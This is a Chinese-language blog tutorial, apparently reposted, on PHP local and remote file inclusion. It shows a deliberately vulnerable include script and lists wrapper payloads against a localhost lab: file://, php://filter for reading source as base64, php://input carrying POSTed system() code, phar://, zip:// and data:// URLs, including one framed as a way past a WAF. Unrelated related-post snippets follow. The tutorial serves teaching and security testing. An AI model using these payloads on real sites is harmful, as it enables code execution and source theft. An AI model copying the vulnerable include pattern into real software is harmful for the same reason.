文件包含漏洞

0x00前言在我们文件上传的时候,如果是白名单通常会配合到文件包含和解析漏洞来getshell,那么这里先来说说文件包含。0x01 文件包含漏洞在php当中的文件包含的内容都会被当作php

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

 0x00  前言

在我们文件上传的时候,如果是白名单通常会配合到文件包含和解析漏洞来getshell,那么这里先来说说文件包含。

0x01 文件包含漏洞

在php当中的文件包含的内容都会被当作php来执行,文件包含本来是个很常见的语法,在一些cms或者是网站源码里面都可以经常看到会包含到一个数据库文件用于连接数据库。直接的去包含一个文件是安全的,但一些开发人员为了灵活方便,去 动态的去包含一个文件的时候就造成了这么一个漏洞。

文件包含函数如下:

include()
include_once()
require()
require_once()

 

下面来编写一个简单的文件包含脚本

<?php $file = $_GET['file'];
include $file;
?>

 

这里get的方式接收file传参过来的内容,然后包含file传参过来的内容。

那么这时候我们如果上传了一个照片马的话,可以直接调用包含来包含我们的照片马,达到getshell的目的。


文件包含漏洞

这里包含了个txt文件,里面的内容直接被当作代码来执行了。

在文件包含当中也分为本地文件包含(LFI)和远程文件包含(RFI)

两者的区别在于本地文件包含只能包含本地的文件,需要上传图片马到对方服务器上,而远程文件包含可以直接调用远程的文件进行包含。但是远程文件包含的条件是:

allow_url_fopen = On    (默认开启)allow_url_include = On  (默认关闭)被包含的变量前没有目录的限制

文件包含漏洞

开启后能直接包含到远程的文件。

协议也可以直接包含文件,


文件包含漏洞

这里直接包含了一个c盘下的1.txt文件内容就可以被我们给显示出来了。

0x02 文件包含伪协议

文件包含的伪协议有如下:

file://    访问本地文件系统
http://    访问 HTTPs 网址
ftp://     访问 ftp URL
Php://     访问输入输出流
Zlib://    压缩流
Data:
//
Ssh2:// security shell2 Expect:// 处理交互式的流 Glob:// 查找匹配的文件路径 phar:// PHP 归档

 

file伪协议读取本地文件:

http://localhost/include/include.php?file=file://c:\1.txt

 

这里需要写入绝对路径 否则包含不了。

php伪协议利用:

php://伪协议主要分为input 和 filter,input 的利用条件是开启allow_url_include,而filter不需要。

http://127.0.0.1/include/include.php?file=php://filter/resource=../test/1.txt

 

使用文件包含读取源码

php://filter/read=convert.base64-encode/resource=include.php

 

这里使用base64加密后读取文件,如果直接读取php文件会失败,或者直接被执行。

php://input使用条件:

allow_url_include   为on

 

http://127.0.0.1/include/include.php?file=php://input

 

post传入数据

<?php system('ipconfig');?>

 


文件包含漏洞

phar://伪协议利用:

利用条件: php版本大于5.3

http://127.0.0.1/include/include.php?file=phar://phpinfo.rar/phpinfo.txt

 

这个方法在绕过一些waf上有一定的作用

zip://伪协议利用:

http://127.0.0.1/include/include.php?file=zip://phpinfo.rar%23phpinfo.txt

 

这里和前面的不同需要用到个#号

data://伪协议利用:

利用条件:

 
http://127.0.0.1/include/include.php?file=data://test/plain,<?php phpinfo();?>

 

这里还可以传入base64的值 有一直概率的绕过waf的拦截

http://127.0.0.1/include/include.php?file=data://test/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

 

  

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/119967.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • PHP JSON格式的输出和解析[通俗易懂]

    PHP JSON格式的输出和解析[通俗易懂]生成JSON格式<?phpheader(‘content-type:application/json’);$number=array(‘1′,’2′,’3′,’4′,’5′,’6′,’7′,’8′,’9′,’0’);echojson_encode($color);//json_encode对变量进行JSON编码?>JSON格式的解析<?phphead…

    2022年7月12日
    27
  • 腾讯七大事业群_腾讯pcg事业群难进吗

    腾讯七大事业群_腾讯pcg事业群难进吗企业发展事业群(CorporateDevelopmentGroup,简称CDG)意如其名,企业发展事业群CDG在腾讯内部担当战略规划、投资者关系维护、业务孵化和投资并购等角色。众所周知的微信、财付通、QQ邮箱等业务均属CDG,诸多投资工作也由CDG负责,比如国内外投资并购、海外市场推广等工作,有志于股权投资、创新业务、国际化并拥有专长的同学可格外关注!互动娱乐事业群(I

    2022年9月14日
    0
  • scrollIntoView()的用法[通俗易懂]

    scrollIntoView()的用法[通俗易懂]STARTscrollIntoView是一个与页面(容器)滚动相关的API(官方解释),该API只有boolean类型的参数能得到良好的支持(firefox36+都支持),所以在这里只讨论参数Boolean类型的情况。EXPLAIN调用方法为element.scrollIntoView()参数默认为true。参数为true时调用该函数,页面(或容器)发生滚动,使elem…

    2022年6月18日
    37
  • 优先队列「建议收藏」

    优先队列「建议收藏」优先队列比如现实生活中的排队,就符合这种先进先出的队列形式,但是像急诊医院排队,就不可能按照先到先治疗的规则,所以需要使用优先队列。实现优先队列其实都是基于下面这些实现的:可以看出来实现优先队列最

    2022年7月3日
    22
  • 2017过去了,2018来了「建议收藏」

    2017那些过往的岁月,留给自己!

    2022年2月26日
    35
  • linux系统抓包工具_kali 抓包

    linux系统抓包工具_kali 抓包在使用ECS服务器时,发现网络流量异常,或者发现服务器有异常向外发包行为,可使用抓包工具抓取网络流量包,分析流量包的特征,看看这些流量包来自哪里,或者发向哪里了。根据这些信息,可进一步诊断异常。本文介绍Linux系统,使用tcpdump工具分析流量的方法。TcpDump可将网络中传送的数据包的“头”完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、not、or等逻…

    2022年8月21日
    3

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号